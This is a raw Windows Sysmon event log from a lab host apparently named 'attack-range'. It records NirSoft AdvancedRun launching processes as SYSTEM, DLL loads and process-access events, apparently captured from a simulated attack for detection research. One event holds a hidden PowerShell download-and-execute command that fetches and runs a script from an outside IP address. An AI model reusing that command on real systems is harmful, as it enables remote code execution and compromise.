20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.116{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.115{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.114{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.112{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.109{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.107{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.106{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.106{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.105{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004079629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.103{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.102{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004079627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.099{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004078672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.950{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004078665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.937{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004078664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.936{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004078663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.936{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004078662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.934{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.932{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.932{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|